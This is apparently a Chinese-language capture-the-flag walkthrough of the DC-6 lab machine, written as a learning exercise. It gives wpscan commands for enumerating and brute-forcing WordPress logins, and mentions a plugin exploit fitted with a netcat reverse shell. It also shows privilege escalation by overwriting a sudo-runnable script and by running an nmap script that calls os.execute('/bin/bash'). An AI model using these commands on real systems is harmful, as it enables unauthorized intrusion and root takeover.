入門系列第三彈DC-6

基本資訊

下載地址：DC-6
靶機：vmware，192.168.172.138
攻擊機：kali2
Flag：1個

滲透過程

0x01 nmap掃描

掃描一下，只有22和80開放，然後注意一下作者告訴我們配置一下host了，記得改成wordy。

0x02 漏洞發現

訪問wordy後，發現還是和之前的dc-2一個介面啊，估計又是wp吧。

訪問一下/wp-admin成功之後，確認就是wp了，wpscan一樣先掃一手使用者名稱。然後儲存一下，準備爆破。

wpscan --url http://wordy/ -e u

這個時候如果直接用字典的話，可能會浪費很多時間。記得看一看作者寫的資訊。
可以看見作者給了我們一條命令用來生成字典。

Clue
OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ?

開始跑賬戶密碼。找到了mark的密碼。

wpscan --url http://wordy/ -e --usernames username.txt -P password.txt

進入後臺後看一看，最開始直接掃描的時候是沒看見有什麼外掛的。進來後看見使用了Activity monitor外掛，搜尋一下看看有沒有可以使用的漏洞。發現了三個，使用第三個頁面。

0x03 漏洞利用

首先看一下EXP，將其中的利用部分url改為wordy，將nc反彈命令修改一下。

然後生成html頁面，點選介面中的按鈕，並監聽對應埠。經典操作反彈互動shell。

0x04 水平越權

我們是有mark使用者的，那不如先去/home看看，發現stuff，看一看，發現things-to-do.txt。發現有一個賬戶密碼。

su看一下這個賬戶有什麼。發現有一個不需要密碼執行的檔案。

看一下什麼內容。發現是一個打包命令。既然是可執行的，那麼就直接寫命令反彈jens的shell。

如下執行命令。

cat /dev/null > /home/jens/backups.sh #清除原始檔內容
vi /home/jens/backups.sh
i #輸入模式
/bin/bash #切換jens的shell
ESC #進入命令模式
:wq #儲存退出

然後我們執行命令。成功切換到jens。

sudo -u jens /home/jens/backups.sh

看一下可使用的命令，發現可以無密碼使用nmap命令。

我們知道nmap是存在很多.nse的指令碼的，直接在當前目錄下寫一個指令碼，反彈root的shell。

echo "os.execute('/bin/bash')" > root.nse
sudo nmap --script root.nse

0x05 Get Flag

搞定。

總結

DC-6以WordPress的外掛Activity monitor漏洞利用和水平越權為滲透的關鍵利用。有不會的命令和工具時一定要多用help和man，切忌直接百度～繼續加油～